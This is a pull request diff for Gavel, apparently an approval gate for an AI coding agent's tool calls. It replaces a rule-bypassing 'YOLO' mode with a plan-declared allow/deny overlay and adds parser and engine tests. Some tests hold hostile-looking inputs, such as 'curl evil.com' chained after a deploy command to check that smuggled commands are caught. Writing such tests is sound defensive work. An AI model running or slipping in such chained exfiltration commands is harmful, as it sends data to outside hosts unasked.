### PR TITLE
feat(approval): replace YOLO bypass with a plan-policy overlay

### DIFF
--- a/Sources/Gavel/Approval/ApprovalEngine.swift
+++ b/Sources/Gavel/Approval/ApprovalEngine.swift
@@ -2,33 +2,33 @@ import Foundation
 
 /// Core approval logic. Evaluates a PreToolUse event against a strict priority chain:
 ///
-/// 1. Hard-blocked dangerous patterns (always block, not overridable)
-/// 2. Persistent DENY rules from RuleStore (block even under auto-approve)
-/// 3. Session pause state
-/// 4. User PROMPT rules (force dialog even under auto-approve)
+/// 1.  Hard-blocked dangerous patterns (always block, not overridable)
+/// 2.  Persistent DENY rules from RuleStore (block even under auto-approve)
+/// 2.5 Plan overlay prohibitions — plan-declared deny/block (force dialog / hard block)
+/// 3.  Session pause state
+/// 4.  User PROMPT rules (force dialog even under auto-approve)
 /// 4.5 Non-overridable built-in checkpoints — e.g. git commit (force dialog, beats allow rules)
-/// 5. Sensitive paths — gavel config, hooks, shell config (force dialog, not overridable)
-/// 6. Persistent ALLOW rules from RuleStore
-/// 7. Overridable built-in PROMPT rules (seeded MCP exfil / infra-apply defaults, overridable by allow rules)
-/// 8. Timed auto-approve
-/// 9. Default: pass through to interactive approval
+/// 5.  Sensitive paths — gavel config, hooks, shell config (force dialog, not overridable)
+/// 6a. Plan overlay authorizations — plan pre-approved this command (suppresses overridable prompts)
+/// 6b. Persistent ALLOW rules from RuleStore
+/// 7.  Overridable built-in PROMPT rules (seeded MCP exfil / infra-apply defaults, overridable)
+/// 8.  Timed auto-approve
+/// 9.  Default: pass through to interactive approval
+///
+/// There is no "bypass everything" mode: engaging a plan layers an allow/deny
+/// overlay (stages 2.5 / 6a) and turns on auto-approve for the inner loop, but
+/// standing checkpoints, sensitive paths, and hard blocks always apply.
 ///
 /// Key invariants:
 /// - Deny rules ALWAYS win over auto-approve.
+/// - Plan overlay prohibitions beat everything except hard blocks and persistent deny.
 /// - Sensitive paths ALWAYS force a dialog — even with a broad allow rule like `Read: *`.
-/// - Overridable built-in prompt rules are overridable by user allow rules (Stage 6 beats Stage 7).
+/// - Overridable built-in prompts are overridable by overlay/user allow (Stage 6 beats Stage 7).
 /// - User prompt rules and non-overridable checkpoints are NOT overridable by allow rules
 ///   (Stage 4 / 4.5 beat Stage 6).
 final class ApprovalEngine {
     let patternMatcher: PatternMatcher
     let ruleStore: RuleStore
-
-    /// Tools that schedule execution outside the live session. Even under YOLO
-    /// these still force a dialog — the agent must not silently plant a job that
-    /// fires while the user isn't watching. Other built-in PROMPT rules (e.g.
-    /// the script-eval exfil defense) ARE bypassed under YOLO; the plan + the
-    /// stage-1 hard-blocks + sensitive-path halt are the safety net.
-    private static let schedulerTools: Set<String> = ["CronCreate", "ScheduleWakeup", "CronDelete"]
 
     init(patternMatcher: PatternMatcher = PatternMatcher(), ruleStore: RuleStore = RuleStore()) {
         self.patternMatcher = patternMatcher
@@ -36,23 +36,7 @@ final class ApprovalEngine {
     }
 
     func evaluate(payload: PreToolUsePayload, session: Session) -> Decision {
-        // YOLO: short-circuit the user-rule chain. Pause wins (falls through).
-        // Kept protections: hard-block (deny), sensitive-path (halt + dialog),
-        // built-in PROMPT rules (dialog, no halt — includes scheduler tools).
-        if session.isYoloActive && !session.isPaused {
-            if let reason = patternMatcher.matchDangerous(payload: payload) {
-                return Decision(verdict: .block, reason: reason)
-            }
-            if let reason = patternMatcher.matchSensitivePath(payload: payload) {
-                YoloMode.disengage(session: session, reason: "gavel-protected path: \(reason)")
-                return Decision(verdict: .block, reason: reason, askUser: true)
-            }
-            if Self.schedulerTools.contains(payload.toolName),
-               let decision = ruleStore.evaluateBuiltInPrompt(payload: payload) {
-                return decision
-            }
-            return Decision(verdict: .allow, reason: "YOLO")
-        }
+        let overlay = session.overlayRules
 
         // 1. Hard-coded dangerous patterns (always block, no override)
         if let reason = patternMatcher.matchDangerous(payload: payload) {
@@ -61,6 +45,11 @@ final class ApprovalEngine {
 
         // 2. Persistent DENY rules — block even under auto-approve
         if let decision = ruleStore.evaluateDeny(payload: payload) {
+            return decision
+        }
+
+        // 2.5 Plan overlay prohibitions — plan-declared deny/block (force dialog / hard block)
+        if let decision = overlayProhibition(overlay, payload) {
             return decision
         }
 
@@ -75,7 +64,7 @@ final class ApprovalEngine {
         }
 
         // 4.5 Non-overridable built-in checkpoints (e.g. git commit) — force dialog,
-        //     checked before allow rules so a broad allow rule can't silence them.
+        //     checked before allow/overlay-allow so nothing can silence them.
         if let decision = ruleStore.evaluateBuiltInPromptNonOverridable(payload: payload) {
             return decision
         }
@@ -86,12 +75,18 @@ final class ApprovalEngine {
             return Decision(verdict: .block, reason: reason, askUser: true)
         }
 
-        // 6. Persistent ALLOW rules
+        // 6a. Plan overlay authorizations — the plan pre-approved this command, so it
+        //     suppresses overridable built-in prompts (e.g. infra-apply) below.
+        if let decision = overlayAuthorization(overlay, payload) {
+            return decision
+        }
+
+        // 6b. Persistent ALLOW rules
         if let decision = ruleStore.evaluateAllow(payload: payload) {
             return decision
         }
 
-        // 7. Built-in PROMPT rules (builtIn=true) — overridable by allow rules above
+        // 7. Overridable built-in PROMPT rules — overridable by allow rules above
         if let decision = ruleStore.evaluateBuiltInPrompt(payload: payload) {
             return decision
         }
@@ -103,5 +98,23 @@ final class ApprovalEngine {
 
         // 9. Default: pass through (HookRouter decides: auto-approve, session rules, or dialog)
         return Decision(verdict: .allow, reason: nil)
+    }
+
+    private func overlayProhibition(_ overlay: [PlanPolicyRule], _ payload: PreToolUsePayload) -> Decision? {
+        for rule in overlay where rule.verdict != .allow {
+            guard rule.matches(toolName: payload.toolName, command: payload.command, filePath: payload.filePath) else { continue }
+            let detail = rule.explanation.map { " — \($0)" } ?? ""
+            let reason = "Plan prohibits \(rule.toolName): \(rule.pattern)\(detail)"
+            return Decision(verdict: .block, reason: reason, askUser: rule.verdict == .prompt)
+        }
+        return nil
+    }
+
+    private func overlayAuthorization(_ overlay: [PlanPolicyRule], _ payload: PreToolUsePayload) -> Decision? {
+        for rule in overlay where rule.verdict == .allow {
+            guard rule.matches(toolName: payload.toolName, command: payload.command, filePath: payload.filePath) else { continue }
+            return Decision(verdict: .allow, reason: "Plan authorizes \(rule.toolName): \(rule.pattern)")
+        }
+        return nil
     }
 }

--- a/Sources/Gavel/Approval/ApprovalEngine.swift
+++ b/Sources/Gavel/Approval/ApprovalEngine.swift
@@ -4,28 +4,28 @@ import Foundation
 ///
 /// 1.  Hard-blocked dangerous patterns (always block, not overridable)
 /// 2.  Persistent DENY rules from RuleStore (block even under auto-approve)
-/// 2.5 Plan overlay prohibitions — plan-declared deny/block (force dialog / hard block)
-/// 3.  Session pause state
-/// 4.  User PROMPT rules (force dialog even under auto-approve)
-/// 4.5 Non-overridable built-in checkpoints — e.g. git commit (force dialog, beats allow rules)
-/// 5.  Sensitive paths — gavel config, hooks, shell config (force dialog, not overridable)
-/// 6a. Plan overlay authorizations — plan pre-approved this command (suppresses overridable prompts)
-/// 6b. Persistent ALLOW rules from RuleStore
-/// 7.  Overridable built-in PROMPT rules (seeded MCP exfil / infra-apply defaults, overridable)
-/// 8.  Timed auto-approve
-/// 9.  Default: pass through to interactive approval
+/// 3.  Plan overlay prohibitions — plan-declared deny/block (force dialog / hard block)
+/// 4.  Session pause state
+/// 5.  Non-overridable built-in checkpoints — e.g. git commit (force dialog, beats every allow)
+/// 6.  Sensitive paths — gavel config, hooks, shell config (force dialog, not overridable)
+/// 7.  Plan overlay authorizations — plan pre-approved this command (beats user prompts + below)
+/// 8.  User PROMPT rules (force dialog even under auto-approve)
+/// 9.  Persistent ALLOW rules from RuleStore
+/// 10. Overridable built-in PROMPT rules (seeded MCP exfil / infra-apply defaults)
+/// 11. Timed auto-approve
+/// 12. Default: pass through to interactive approval
 ///
 /// There is no "bypass everything" mode: engaging a plan layers an allow/deny
-/// overlay (stages 2.5 / 6a) and turns on auto-approve for the inner loop, but
+/// overlay (stages 3 / 7) and turns on auto-approve for the inner loop, but
 /// standing checkpoints, sensitive paths, and hard blocks always apply.
 ///
 /// Key invariants:
 /// - Deny rules ALWAYS win over auto-approve.
 /// - Plan overlay prohibitions beat everything except hard blocks and persistent deny.
-/// - Sensitive paths ALWAYS force a dialog — even with a broad allow rule like `Read: *`.
-/// - Overridable built-in prompts are overridable by overlay/user allow (Stage 6 beats Stage 7).
-/// - User prompt rules and non-overridable checkpoints are NOT overridable by allow rules
-///   (Stage 4 / 4.5 beat Stage 6).
+/// - The commit checkpoint + sensitive paths beat EVERY allow, including the overlay.
+/// - A plan overlay allow beats user PROMPT rules and below — a narrow, reviewed,
+///   hash-locked authorization overrides a broad standing prompt for that command only.
+/// - User prompt rules still beat persistent allow rules (Stage 8 beats Stage 9).
 final class ApprovalEngine {
     let patternMatcher: PatternMatcher
     let ruleStore: RuleStore
@@ -58,45 +58,48 @@ final class ApprovalEngine {
             return Decision(verdict: .block, reason: "Session paused via Gavel")
         }
 
-        // 4. User PROMPT rules (builtIn=false) — force dialog, beats allow rules
-        if let decision = ruleStore.evaluateUserPrompt(payload: payload) {
-            return decision
-        }
-
-        // 4.5 Non-overridable built-in checkpoints (e.g. git commit) — force dialog,
-        //     checked before allow/overlay-allow so nothing can silence them.
+        // 4. Non-overridable built-in checkpoints (e.g. git commit) — force dialog,
+        //    checked before any allow (overlay or otherwise) so nothing can silence them.
         if let decision = ruleStore.evaluateBuiltInPromptNonOverridable(payload: payload) {
             return decision
         }
 
         // 5. Sensitive paths — gavel config, hooks, shell config (force dialog)
-        //    Checked BEFORE allow rules so broad rules like `Read: *` can't bypass self-protection.
+        //    Checked before any allow so broad rules like `Read: *` can't bypass self-protection.
         if let reason = patternMatcher.matchSensitivePath(payload: payload) {
             return Decision(verdict: .block, reason: reason, askUser: true)
         }
 
-        // 6a. Plan overlay authorizations — the plan pre-approved this command, so it
-        //     suppresses overridable built-in prompts (e.g. infra-apply) below.
+        // 6. Plan overlay authorizations — the plan pre-approved this command. Placed
+        //    above user PROMPT rules so a narrow, reviewed, hash-locked plan allow can
+        //    override a broad standing prompt (e.g. authorize `cdk deploy GreenfieldStack`
+        //    despite a general `cdk deploy` prompt rule). Still below deny / checkpoint /
+        //    sensitive paths, so it never overrides a hard rule.
         if let decision = overlayAuthorization(overlay, payload) {
             return decision
         }
 
-        // 6b. Persistent ALLOW rules
+        // 7. User PROMPT rules (builtIn=false) — force dialog, beats allow rules below
+        if let decision = ruleStore.evaluateUserPrompt(payload: payload) {
+            return decision
+        }
+
+        // 8. Persistent ALLOW rules
         if let decision = ruleStore.evaluateAllow(payload: payload) {
             return decision
         }
 
-        // 7. Overridable built-in PROMPT rules — overridable by allow rules above
+        // 9. Overridable built-in PROMPT rules — overridable by allow rules above
         if let decision = ruleStore.evaluateBuiltInPrompt(payload: payload) {
             return decision
         }
 
-        // 8. Timed auto-approve
+        // 10. Timed auto-approve
         if session.isAutoApproveActive {
             return Decision(verdict: .allow, reason: "AUTO-APPROVED (timed)")
         }
 
-        // 9. Default: pass through (HookRouter decides: auto-approve, session rules, or dialog)
+        // 11. Default: pass through (HookRouter decides: auto-approve, session rules, or dialog)
         return Decision(verdict: .allow, reason: nil)
     }
 

--- a/Sources/Gavel/Approval/ApprovalPanelView.swift
+++ b/Sources/Gavel/Approval/ApprovalPanelView.swift
@@ -42,11 +42,11 @@ final class NoteFieldState: ObservableObject {
         return text
     }
 
-    func reset(seededText: String) {
+    func reset(seededText: String, defaultSend: Bool = false) {
         text = seededText
         seeded = seededText
         hasBeenEdited = false
-        sendToClaude = false
+        sendToClaude = defaultSend
     }
 
     /// Called from the field's `onChange`. Promotes the first text mutation
@@ -208,7 +208,8 @@ struct ApprovalPanelView: View {
             } else {
                 seeded = "User approved this via Gavel"
             }
-            noteState.reset(seededText: seeded)
+            let autoOn = a.session.isAutoApproveEnabled || a.session.isAutoApproveActive
+            noteState.reset(seededText: seeded, defaultSend: autoOn)
             isRegexMode = false
         }
     }
@@ -864,7 +865,7 @@ private struct NoteField: View {
                 HStack(spacing: 6) {
                     Image(systemName: state.sendToClaude ? "checkmark.square.fill" : "square")
                         .foregroundColor(state.sendToClaude ? .accentColor : .secondary)
-                    Text("Send note to Claude (off by default — used for testing / explicit context)")
+                    Text("Send note to Claude (on by default under auto-approve)")
                         .font(.caption)
                         .foregroundColor(.secondary)
                 }

--- a/Sources/Gavel/Approval/PlanPolicyParser.swift
+++ b/Sources/Gavel/Approval/PlanPolicyParser.swift
@@ -1,0 +1,110 @@
+import Foundation
+
+/// A plan-declared approval rule, parsed from a ```gavel-policy fenced block in
+/// a plan markdown file and layered onto a session as an overlay while the plan
+/// is engaged.
+///
+/// Allow rules are segment-safe: every `&&`/`||`/`;`/`|` segment of a Bash
+/// command must match, so an authorized prefix like `cdk deploy*` can't smuggle
+/// a chained `curl evil`. Deny rules match if ANY segment matches, so a
+/// prohibited command can't hide behind a benign prefix.
+struct PlanPolicyRule {
+    let toolName: String
+    let pattern: String
+    let isRegex: Bool
+    let verdict: DecisionVerdict
+    let explanation: String?
+    private let regex: NSRegularExpression?
+
+    init(toolName: String, pattern: String, isRegex: Bool, verdict: DecisionVerdict, explanation: String? = nil) {
+        self.toolName = toolName
+        self.pattern = pattern
+        self.isRegex = isRegex
+        self.verdict = verdict
+        self.explanation = explanation
+        self.regex = PatternCompiler.compilePattern(pattern, isRegex: isRegex)
+    }
+
+    func matches(toolName: String, command: String?, filePath: String?) -> Bool {
+        guard self.toolName == toolName || self.toolName == "*", let regex else { return false }
+        if toolName == "Bash" {
+            let segments = SessionRule.splitCommandSegments(Self.sanitize(command ?? ""))
+            guard !segments.isEmpty else { return false }
+            return verdict == .allow
+                ? segments.allSatisfy { PatternCompiler.matches(regex, in: $0) }
+                : segments.contains { PatternCompiler.matches(regex, in: $0) }
+        }
+        let target = Self.sanitize(filePath ?? command ?? "")
+        return PatternCompiler.matches(regex, in: target)
+            || PatternCompiler.matches(regex, in: toolName)
+    }
+
+    private static func sanitize(_ s: String) -> String {
+        s.replacingOccurrences(of: "\u{2013}", with: "-")
+         .replacingOccurrences(of: "\u{2014}", with: "--")
+         .replacingOccurrences(of: "\u{2012}", with: "-")
+    }
+}
+
+/// Parses the first ```gavel-policy fenced block in a plan's markdown into
+/// session overlay rules. No YAML dependency — one rule per line:
+///
+///     allow Bash: cdk deploy GreenfieldStack*
+///     deny  Bash: cdk destroy*
+///     block Bash: re:terraform\s+destroy
+///
+/// Grammar: `<allow|deny|block> <ToolName>: <pattern>`. Pattern is glob by
+/// default; a `re:` prefix marks it regex. `deny` maps to a prompt (force
+/// dialog); `block` is a hard deny. Blank lines, `#` comments, and lines that
+/// don't parse are skipped.
+enum PlanPolicyParser {
+    static func parse(_ planText: String) -> [PlanPolicyRule] {
+        guard let body = fencedBlock(in: planText) else { return [] }
+        var rules: [PlanPolicyRule] = []
+        for rawLine in body.components(separatedBy: "\n") {
+            let line = rawLine.trimmingCharacters(in: .whitespaces)
+            if line.isEmpty || line.hasPrefix("#") { continue }
+            if let rule = parseLine(line) { rules.append(rule) }
+        }
+        return rules
+    }
+
+    private static func fencedBlock(in text: String) -> String? {
+        var collecting = false
+        var collected: [String] = []
+        for line in text.components(separatedBy: "\n") {
+            let trimmed = line.trimmingCharacters(in: .whitespaces)
+            if !collecting {
+                if trimmed == "```gavel-policy" || trimmed == "~~~gavel-policy" { collecting = true }
+            } else if trimmed == "```" || trimmed == "~~~" {
+                return collected.joined(separator: "\n")
+            } else {
+                collected.append(line)
+            }
+        }
+        return collecting ? collected.joined(separator: "\n") : nil
+    }
+
+    private static func parseLine(_ line: String) -> PlanPolicyRule? {
+        guard let colon = line.firstIndex(of: ":") else { return nil }
+        let head = line[..<colon].split(whereSeparator: { $0 == " " || $0 == "\t" }).map(String.init)
+        guard head.count == 2 else { return nil }
+
+        let verdict: DecisionVerdict
+        switch head[0].lowercased() {
+        case "allow": verdict = .allow
+        case "deny": verdict = .prompt
+        case "block": verdict = .block
+        default: return nil
+        }
+
+        var pattern = String(line[line.index(after: colon)...]).trimmingCharacters(in: .whitespaces)
+        guard !pattern.isEmpty else { return nil }
+        var isRegex = false
+        if pattern.hasPrefix("re:") {
+            isRegex = true
+            pattern = String(pattern.dropFirst(3)).trimmingCharacters(in: .whitespaces)
+        }
+        return PlanPolicyRule(toolName: head[1], pattern: pattern, isRegex: isRegex, verdict: verdict)
+    }
+}

--- a/Sources/Gavel/Approval/YoloMode.swift
+++ b/Sources/Gavel/Approval/YoloMode.swift
@@ -36,6 +36,8 @@ enum YoloMode {
         let (ok, _) = canEngage(session: session)
         guard ok, let path = session.lastPlanPath else { return false }
         let hash = sha256(ofFileAt: path)
+        let overlay = (try? String(contentsOfFile: path, encoding: .utf8)).map(PlanPolicyParser.parse) ?? []
+        session.overlayRules = overlay
         session.setYoloActive(true)
         DispatchQueue.main.async {
             session.yoloEngagedAt = Date()
@@ -43,6 +45,7 @@ enum YoloMode {
             session.yoloPlanHash = hash
             session.yoloDisabledReason = nil
             session.isSubAgentInheritEnabled = true
+            session.isAutoApproveEnabled = true
         }
         return true
     }
@@ -70,13 +73,15 @@ enum YoloMode {
     /// Caller is responsible for calling `SessionManager.saveActiveSessions()` after.
     static func disengage(session: Session, reason: String) {
         session.setYoloActive(false)
+        session.overlayRules = []
         DispatchQueue.main.async {
             session.yoloEngagedAt = nil
             session.yoloPlanPath = nil
             session.yoloPlanHash = nil
             session.yoloDisabledReason = reason
+            session.isAutoApproveEnabled = false
         }
-        GavelNotifications.notify(title: "Gavel — YOLO halted", body: reason)
+        GavelNotifications.notify(title: "Gavel — plan policy dropped", body: reason)
     }
 
     static func isPlanPath(_ path: String) -> Bool {

--- a/Sources/Gavel/Daemon/HookRouter.swift
+++ b/Sources/Gavel/Daemon/HookRouter.swift
@@ -155,12 +155,12 @@ final class HookRouter {
         if session.isYoloActive, let haltReason = YoloMode.shouldHalt(session: session, payload: payload) {
             YoloMode.disengage(session: session, reason: haltReason)
             sessionManager.saveActiveSessions()
-            emitFeed(.system("YOLO halted: \(haltReason)", pid: session.pid, at: timestamp))
-            emitFeed(.decision(badge: .block, reason: "YOLO halted: \(haltReason)", pid: session.pid, at: timestamp))
+            emitFeed(.system("Plan dropped: \(haltReason)", pid: session.pid, at: timestamp))
+            emitFeed(.decision(badge: .block, reason: "Plan dropped: \(haltReason)", pid: session.pid, at: timestamp))
             let decision = approvalCoordinator.requestApproval(
                 payload: payload, session: session, timestamp: timestamp,
                 forceDialog: true,
-                triggerReason: "YOLO halted: \(haltReason)",
+                triggerReason: "Plan dropped: \(haltReason)",
                 triggeringRuleId: nil
             )
             switch decision.verdict {

--- a/Sources/Gavel/Daemon/SessionManager.swift
+++ b/Sources/Gavel/Daemon/SessionManager.swift
@@ -349,6 +349,9 @@ final class SessionManager: ObservableObject {
         session.yoloPlanPath = path
         session.yoloPlanHash = originalHash
         session.yoloDisabledReason = snap.yoloDisabledReason
+        if let text = try? String(contentsOfFile: path, encoding: .utf8) {
+            session.overlayRules = PlanPolicyParser.parse(text)
+        }
         session.setYoloActive(true)
     }
 

--- a/Sources/Gavel/Models/Decision.swift
+++ b/Sources/Gavel/Models/Decision.swift
@@ -85,7 +85,7 @@ enum DecisionBadge: String {
     case allow = "ALLOW"
     case autoApprove = "AUTO"
     case sandbox = "SANDBOX"
-    case yolo = "YOLO"
+    case yolo = "PLAN"
     case block = "BLOCK"
     case paused = "PAUSED"
 }

--- a/Sources/Gavel/Models/Session.swift
+++ b/Sources/Gavel/Models/Session.swift
@@ -67,6 +67,16 @@ final class Session: ObservableObject, Identifiable {
         yoloLock.unlock()
     }
 
+    private var _overlayRules: [PlanPolicyRule] = []
+
+    /// Plan-declared allow/deny rules, layered while a plan is engaged. Guarded by
+    /// `yoloLock` because it's set on engage (main) and read by the socket worker
+    /// on every PreToolUse. Empty when no plan is engaged.
+    var overlayRules: [PlanPolicyRule] {
+        get { yoloLock.lock(); defer { yoloLock.unlock() }; return _overlayRules }
+        set { yoloLock.lock(); _overlayRules = newValue; yoloLock.unlock() }
+    }
+
     // Worker-mutable state. NOT @Published on purpose — both are touched on
     // every PreToolUse hook from background threads, and `@Published`
     // mutations from non-main contend with SwiftUI's main-thread publish
@@ -121,6 +131,7 @@ final class Session: ObservableObject, Identifiable {
         sessionRules.removeAll()
         suppressedRuleIds.removeAll()
         setYoloActive(false)
+        overlayRules = []
         yoloEngagedAt = nil
         yoloPlanPath = nil
         yoloPlanHash = nil

--- a/Sources/Gavel/Monitor/MonitorWindow.swift
+++ b/Sources/Gavel/Monitor/MonitorWindow.swift
@@ -443,7 +443,7 @@ private struct SessionRow: View {
     }
 
     private var engageButton: some View {
-        Button("YOLO") {
+        Button("Plan") {
             if YoloMode.engage(session: session) {
                 viewModel.sessionManager.saveActiveSessions()
                 viewModel.noteInteraction()
@@ -464,7 +464,7 @@ private struct SessionRow: View {
             viewModel.noteInteraction()
         }) {
             HStack(spacing: 3) {
-                Text("YOLO")
+                Text("Plan")
                     .font(.caption.bold())
                 Image(systemName: "xmark.circle.fill")
                     .font(.caption2)
@@ -504,7 +504,7 @@ private struct SessionRow: View {
         .menuIndicator(.hidden)
         .controlSize(.small)
         .frame(width: 30)
-        .help("Pick the plan that gates YOLO for this session (overrides auto-detect).")
+        .help("Pick the plan to engage for this session (overrides auto-detect).")
     }
 
     private func armPlan(_ path: String) {
@@ -519,8 +519,8 @@ private struct SessionRow: View {
             panel.allowedContentTypes = [markdown]
         }
         panel.allowsMultipleSelection = false
-        panel.title = "Select Plan for YOLO"
-        panel.message = "Pick a plan markdown file to gate this session's YOLO mode."
+        panel.title = "Select Plan to Engage"
+        panel.message = "Pick a plan markdown file to engage for this session."
         panel.directoryURL = YoloMode.plansDirectory()
         guard panel.runModal() == .OK, let url = panel.url else { return }
         armPlan(url.path)
@@ -528,16 +528,16 @@ private struct SessionRow: View {
 
     private var yoloActiveHelp: String {
         let planName = (session.yoloPlanPath as NSString?)?.lastPathComponent ?? "unknown plan"
-        return "YOLO active — tracking \(planName). Click to disengage. User rules are bypassed; protected paths still halt."
+        return "Plan engaged — \(planName). Auto-approve is on for routine work; commit/infra still prompt and the plan's allow/deny apply. Click to drop."
     }
 
     private var yoloIdleHelp: String {
         if let reason = session.yoloDisabledReason {
-            return "YOLO halted: \(reason). Click to re-engage with the current plan."
+            return "Plan dropped: \(reason). Click to re-engage with the current plan."
         }
         if let plan = session.lastPlanPath {
             let name = (plan as NSString).lastPathComponent
-            return "Engage YOLO — tracking \(name). Bypasses user rules; halts on plan changes or protected-path access."
+            return "Engage plan \(name) — turns on auto-approve, applies the plan's allow/deny overlay, keeps commit/infra prompting. Drops if the plan changes on disk."
         }
         return "No plan armed — pick one from the menu, or run /propose."
     }

--- a/Tests/GavelTests/PlanPolicyParserTests.swift
+++ b/Tests/GavelTests/PlanPolicyParserTests.swift
@@ -1,0 +1,76 @@
+import XCTest
+@testable import Gavel
+
+final class PlanPolicyParserTests: XCTestCase {
+
+    private func plan(_ body: String) -> String {
+        "# Some plan\n\nProse here.\n\n```gavel-policy\n\(body)\n```\n\nMore prose.\n"
+    }
+
+    // MARK: - Parsing
+
+    func testParsesAllowDenyBlockVerdicts() {
+        let rules = PlanPolicyParser.parse(plan("""
+        allow Bash: cdk deploy GreenfieldStack*
+        deny Bash: cdk destroy*
+        block Bash: terraform destroy*
+        """))
+        XCTAssertEqual(rules.count, 3)
+        XCTAssertEqual(rules[0].verdict, .allow)
+        XCTAssertEqual(rules[1].verdict, .prompt, "deny maps to a prompt (force dialog)")
+        XCTAssertEqual(rules[2].verdict, .block, "block is a hard deny")
+    }
+
+    func testRegexPrefix() {
+        let rules = PlanPolicyParser.parse(plan(#"deny Bash: re:terraform\s+destroy"#))
+        XCTAssertEqual(rules.count, 1)
+        XCTAssertTrue(rules[0].isRegex)
+        XCTAssertTrue(rules[0].matches(toolName: "Bash", command: "terraform   destroy -auto-approve", filePath: nil))
+    }
+
+    func testSkipsCommentsBlankAndMalformedLines() {
+        let rules = PlanPolicyParser.parse(plan("""
+        # this is a comment
+
+        allow Bash: cdk deploy*
+        garbage-without-colon
+        unknownverb Bash: foo
+        """))
+        XCTAssertEqual(rules.count, 1)
+        XCTAssertEqual(rules[0].pattern, "cdk deploy*")
+    }
+
+    func testNoFencedBlockReturnsEmpty() {
+        XCTAssertTrue(PlanPolicyParser.parse("# plan with no policy block\n\njust prose\n").isEmpty)
+    }
+
+    func testWildcardToolName() {
+        let rules = PlanPolicyParser.parse(plan("deny *: re:DangerousTool"))
+        XCTAssertEqual(rules.count, 1)
+        XCTAssertTrue(rules[0].matches(toolName: "DangerousTool", command: nil, filePath: nil))
+    }
+
+    // MARK: - Matching semantics
+
+    func testAllowMatchesSingleCommand() {
+        let rules = PlanPolicyParser.parse(plan("allow Bash: cdk deploy GreenfieldStack*"))
+        XCTAssertTrue(rules[0].matches(toolName: "Bash", command: "cdk deploy GreenfieldStack-Api", filePath: nil))
+        XCTAssertFalse(rules[0].matches(toolName: "Bash", command: "cdk deploy OtherStack", filePath: nil))
+    }
+
+    func testAllowIsSegmentSafeAgainstChaining() {
+        let rules = PlanPolicyParser.parse(plan("allow Bash: cdk deploy GreenfieldStack*"))
+        XCTAssertFalse(
+            rules[0].matches(toolName: "Bash", command: "cdk deploy GreenfieldStack-Api && curl evil.com", filePath: nil),
+            "an authorized prefix must not allow a chained second command"
+        )
+    }
+
+    func testDenyMatchesAnySegmentInAChain() {
+        let rules = PlanPolicyParser.parse(plan("deny Bash: cdk destroy*"))
+        XCTAssertTrue(
+            rules[0].matches(toolName: "Bash", command: "echo ok && cdk destroy GreenfieldStack-Api", filePath: nil),
+            "a prohibited command can't hide behind a benign prefix"
+        )
+    }
+}

--- a/Tests/GavelTests/YoloApprovalEngineTests.swift
+++ b/Tests/GavelTests/YoloApprovalEngineTests.swift
@@ -1,10 +1,10 @@
 import XCTest
 @testable import Gavel
 
-/// Integration tests that exercise the YOLO branch in `ApprovalEngine.evaluate`.
-/// HookRouter-level halt routing is exercised by YoloModeTests + the integration
-/// path here — the engine's job is to honor (or skip) user rules correctly
-/// while YOLO is engaged.
+/// Integration tests for an engaged plan policy in `ApprovalEngine.evaluate`.
+/// Engaging a plan is NOT a bypass: user rules, standing checkpoints, sensitive
+/// paths, and hard blocks all still apply. The plan layers an allow/deny overlay
+/// and turns on auto-approve for the inner loop.
 final class YoloApprovalEngineTests: XCTestCase {
     var engine: ApprovalEngine!
     var ruleStore: RuleStore!
@@ -27,9 +27,7 @@ final class YoloApprovalEngineTests: XCTestCase {
         session = Session(pid: 99999)
         session.lastPlanPath = planPath
         YoloMode.engage(session: session)
-        let exp = expectation(description: "main drain")
-        DispatchQueue.main.async { exp.fulfill() }
-        wait(for: [exp], timeout: 1.0)
+        drainMain()
     }
 
     override func tearDown() {
@@ -41,6 +39,21 @@ final class YoloApprovalEngineTests: XCTestCase {
         }
     }
 
+    private func drainMain() {
+        let exp = expectation(description: "main drain")
+        DispatchQueue.main.async { exp.fulfill() }
+        wait(for: [exp], timeout: 1.0)
+    }
+
+    /// Rewrite the plan with a gavel-policy block and re-engage.
+    private func engageWithPolicy(_ lines: [String]) {
+        let block = "```gavel-policy\n" + lines.joined(separator: "\n") + "\n```\n"
+        try? ("# plan\n\n" + block).write(toFile: planPath, atomically: true, encoding: .utf8)
+        YoloMode.disengage(session: session, reason: "re-engage")
+        YoloMode.engage(session: session)
+        drainMain()
+    }
+
     private func payload(tool: String = "Bash", command: String? = nil, filePath: String? = nil) -> PreToolUsePayload {
         var input: [String: AnyCodable] = [:]
         if let c = command { input["command"] = AnyCodable(c) }
@@ -48,110 +61,138 @@ final class YoloApprovalEngineTests: XCTestCase {
         return PreToolUsePayload(toolName: tool, toolInput: input)
     }
 
-    // MARK: - S2: User rules bypassed under YOLO
+    // MARK: - Engaging a plan turns on / relocks auto-approve
 
-    func testYoloBypassesUserPromptRule() {
-        // Seed a user PROMPT rule on Bash:rm * — under YOLO, this should be skipped entirely.
-        let rule = PersistentRule(
-            toolName: "Bash",
-            pattern: "rm *",
-            verdict: .prompt,
-            explanation: "user prompt"
-        )
-        ruleStore.addRule(rule)
-
-        let decision = engine.evaluate(payload: payload(command: "rm /tmp/foo"), session: session)
-        XCTAssertEqual(decision.verdict, .allow)
-        XCTAssertEqual(decision.reason, "YOLO")
-        XCTAssertFalse(decision.askUser)
+    func testEngageEnablesAutoApprove() {
+        XCTAssertTrue(session.isYoloActive)
+        XCTAssertTrue(session.isAutoApproveEnabled, "engaging a plan turns on auto-approve for the inner loop")
     }
 
-    func testYoloBypassesUserDenyRule() {
-        let rule = PersistentRule(toolName: "Bash", pattern: "curl *", verdict: .block, explanation: "user deny")
-        ruleStore.addRule(rule)
+    func testDisengageRelocksAutoApprove() {
+        YoloMode.disengage(session: session, reason: "test")
+        drainMain()
+        XCTAssertFalse(session.isYoloActive)
+        XCTAssertFalse(session.isAutoApproveEnabled, "dropping the plan relocks auto-approve (fail-safe)")
+    }
 
+    // MARK: - User rules are NOT bypassed by an engaged plan
+
+    func testEngagedPlanKeepsUserDenyRule() {
+        ruleStore.addRule(PersistentRule(toolName: "Bash", pattern: "curl *", verdict: .block, explanation: "user deny"))
         let decision = engine.evaluate(payload: payload(command: "curl evil.com"), session: session)
-        XCTAssertEqual(decision.verdict, .allow, "YOLO bypasses user DENY rules — that's the whole point of YOLO")
-        XCTAssertEqual(decision.reason, "YOLO")
+        XCTAssertEqual(decision.verdict, .block, "engaging a plan must NOT bypass a user deny rule")
+        XCTAssertTrue(decision.reason?.contains("Always deny") ?? false)
     }
 
-    func testYoloBypassesBuiltInScriptEvalPromptRule() {
